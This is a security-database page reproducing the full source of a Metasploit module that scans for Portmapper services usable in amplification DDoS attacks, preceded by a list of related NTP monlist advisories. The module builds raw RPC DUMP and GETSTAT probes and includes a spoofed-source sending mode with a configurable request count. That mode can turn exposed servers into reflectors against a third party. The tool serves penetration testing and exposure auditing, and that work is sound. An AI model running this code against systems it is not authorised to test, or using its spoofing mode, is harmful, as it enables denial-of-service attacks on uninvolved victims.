Portmapper Amplification Scanner

🗓️ 01 Sep 2024 00:00:00Reported by Jay Turla, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 245 Views

Portmapper Amplification Scanner for discovering Portmapper services that can be used in an amplification DDoS attack against a third party

Reporter	Title	Published	Views	Family All 144
0day.today	NTP ntpd monlist Query Reflection - Denial of Service	29 Apr 201400:00	–	zdt
IBM Security Bulletins	Security Bulletin: IBM BladeCenter Advanced Management Module Account Information Exposure (CVE-2013-5211)	14 Apr 202314:32	–	ibm
IBM Security Bulletins	Security Bulletin: Vyatta 5600 vRouter Software Patches - Release 1801-zb	11 Sep 201917:35	–	ibm
IBM Security Bulletins	Security Bulletin: Three potential vulnerabilities in IBM GCM16/GCM32 Global Console Managers (CVE-2014-3085, CVE-2014-3081, CVE-2014-3080)	31 Jan 201901:25	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Flex System Manager (FSM) is affected by security vulnerabilities. (CVE-2013-5772, CVE-2013-5803, CVE-2013-5372, CVE-2013-5780, CVE-2013-5211)	31 Jan 201901:25	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Flex System Manager (FSM) is affected by vulnerability (CVE-2013-5211)	31 Jan 201901:25	–	ibm
IBM Security Bulletins	Security Bulletin: Libxml2 vulnerabilities in Network Intrusion Prevention System (CVE-2014-0191, CVE-2013-2877, CVE-2014-3660, CVE-2013-5211)	23 Feb 202219:48	–	ibm
IBM Security Bulletins	Security Bulletin: The IBM Chassis Management Module (CMM) is affected by a vulnerability in NTP server (CVE-2013-5211)	31 Jan 201901:25	–	ibm
IBM Security Bulletins	Security Bulletin: NTP vulnerability in Network Intrusion Prevention System (CVE-2013-5211)	23 Feb 202219:48	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Virtualization Engine TS7700 - The NTP monlist command is enabled (CVE-2013-5211)	18 Jun 201800:09	–	ibm

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::UDPScanner  
include Msf::Auxiliary::DRDoS  
  
def initialize  
super(  
'Name' => 'Portmapper Amplification Scanner',  
'Description' => %q{  
This module can be used to discover Portmapper services which can be used in an  
amplification DDoS attack against a third party.  
},  
'Author' => ['xistence <xistence[at]0x90.nl>'],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb  
['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-017A'],  
['URL', 'http://blog.level3.com/security/a-new-ddos-reflection-attack-portmapper-an-early-warning-to-the-industry/']  
],  
)  
  
register_options( [  
Opt::RPORT(111),  
])  
end  
  
def rport  
datastore['RPORT']  
end  
  
def xid_summary  
@xid_summary ||= [Rex::Text::rand_text_numeric(8).to_i].pack('N')  
end  
  
def xid_dump  
@xid_dump ||= [Rex::Text::rand_text_numeric(8).to_i].pack('N')  
end  
  
def xid_metrics  
@xid_metrics ||= [Rex::Text::rand_text_numeric(8).to_i].pack('N')  
end  
  
def setup  
super  
  
# RPC DUMP (Program version: 3) request: rpcinfo -T udp -s <IP>  
@portmap_summary = ''  
@portmap_summary << xid_summary # Random ID  
@portmap_summary << "\x00\x00\x00\x00" # Message Type: 0 (Call)  
@portmap_summary << "\x00\x00\x00\x02" # RPC Version: 2  
@portmap_summary << "\x00\x01\x86\xa0" # Program: Portmap (10000)  
@portmap_summary << "\x00\x00\x00\x03" # Program version: 3  
@portmap_summary << "\x00\x00\x00\x04" # Procedure: DUMP (4)  
@portmap_summary << "\x00\x00\x00\x00" # Credentials Flavor: AUTH_NULL (0)  
@portmap_summary << "\x00\x00\x00\x00" # Credentials Length: 0  
@portmap_summary << "\x00\x00\x00\x00" # Verifier Flavor: AUTH_NULL (0)  
@portmap_summary << "\x00\x00\x00\x00" # Verifier Length: 0  
  
# RPC DUMP (Program version: 2) request: rpcinfo -T udp -p <IP>  
@portmap_dump = ''  
@portmap_dump << xid_dump # Random ID  
@portmap_dump << "\x00\x00\x00\x00" # Message Type: 0 (Call)  
@portmap_dump << "\x00\x00\x00\x02" # RPC Version: 2  
@portmap_dump << "\x00\x01\x86\xa0" # Program: Portmap (10000)  
@portmap_dump << "\x00\x00\x00\x02" # Program version: 2  
@portmap_dump << "\x00\x00\x00\x04" # Procedure: DUMP (4)  
@portmap_dump << "\x00\x00\x00\x00" # Credentials Flavor: AUTH_NULL (0)  
@portmap_dump << "\x00\x00\x00\x00" # Credentials Length: 0  
@portmap_dump << "\x00\x00\x00\x00" # Verifier Flavor: AUTH_NULL (0)  
@portmap_dump << "\x00\x00\x00\x00" # Verifier Length: 0  
  
# RPC GETSTAT request: rpcinfo -T udp -m <IP>  
@portmap_metrics = ''  
@portmap_metrics << xid_metrics # Random ID  
@portmap_metrics << "\x00\x00\x00\x00" # Message Type: 0 (Call)  
@portmap_metrics << "\x00\x00\x00\x02" # RPC Version: 2  
@portmap_metrics << "\x00\x01\x86\xa0" # Program: Portmap (10000)  
@portmap_metrics << "\x00\x00\x00\x04" # Program version: 4  
@portmap_metrics << "\x00\x00\x00\x0c" # Procedure: GETSTAT (12)  
@portmap_metrics << "\x00\x00\x00\x00" # Credentials Flavor: AUTH_NULL (0)  
@portmap_metrics << "\x00\x00\x00\x00" # Credentials Length: 0  
@portmap_metrics << "\x00\x00\x00\x00" # Verifier Flavor: AUTH_NULL (0)  
@portmap_metrics << "\x00\x00\x00\x00" # Verifier Length: 0  
end  
  
def scanner_prescan(batch)  
print_status("Sending Portmap RPC probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")  
@results_summary = {}  
@results_dump = {}  
@results_metrics = {}  
end  
  
def scan_host(ip)  
if spoofed?  
datastore['ScannerRecvWindow'] = 0  
scanner_spoof_send(@portmap_summary, ip, rport, datastore['SRCIP'], datastore['NUM_REQUESTS'])  
scanner_spoof_send(@portmap_dump, ip, rport, datastore['SRCIP'], datastore['NUM_REQUESTS'])  
scanner_spoof_send(@portmap_metrics, ip, rport, datastore['SRCIP'], datastore['NUM_REQUESTS'])  
else  
scanner_send(@portmap_summary, ip, rport)  
scanner_send(@portmap_dump, ip, rport)  
scanner_send(@portmap_metrics, ip, rport)  
end  
end  
  
def scanner_process(data, shost, sport)  
if data =~ /#{@xid_summary}\x00\x00\x00\x01/  
@results_summary[shost] ||= []  
@results_summary[shost] << data  
elsif data =~ /#{@xid_metrics}\x00\x00\x00\x01/  
@results_metrics[shost] ||= []  
@results_metrics[shost] << data  
elsif data =~ /#{@xid_dump}\x00\x00\x00\x01/  
@results_dump[shost] ||= []  
@results_dump[shost] << data  
else  
vprint_error("Skipping #{data.size}-byte non-Portmap response from #{shost}:#{sport}")  
end  
end  
  
# Called after the scan block  
def scanner_postscan(batch)  
@results_summary.keys.each do |k|  
response_map_summary = { @portmap_summary => @results_summary[k] }  
what = 'Portmap RPC DUMP (Program version: 3) amplification'  
report_result(k, what, response_map_summary)  
end  
  
@results_dump.keys.each do |k|  
response_map_dump = { @portmap_dump => @results_dump[k] }  
what = 'Portmap RPC DUMP (Program version: 2) amplification'  
report_result(k, what, response_map_dump)  
end  
  
@results_metrics.keys.each do |k|  
response_map_metrics = { @portmap_summary => @results_metrics[k] }  
what = 'Portmap RPC GETSTAT amplification'  
report_result(k, what, response_map_metrics)  
end  
end  
  
def report_result(host, attack, map)  
report_service(  
host: host,  
proto: 'udp',  
port: rport,  
name: 'portmap'  
)  
  
peer = "#{host}:#{rport}"  
vulnerable, proof = prove_amplification(map)  
if vulnerable  
print_good("#{peer} - Vulnerable to #{attack}: #{proof}")  
report_vuln(  
host: host,  
port: rport,  
proto: 'udp',  
name: attack,  
refs: references  
)  
else  
vprint_status("#{peer} - Not vulnerable to #{attack}: #{proof}")  
end  
end  
end  
  
  
`

01 Sep 2024 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 25

EPSS0.92136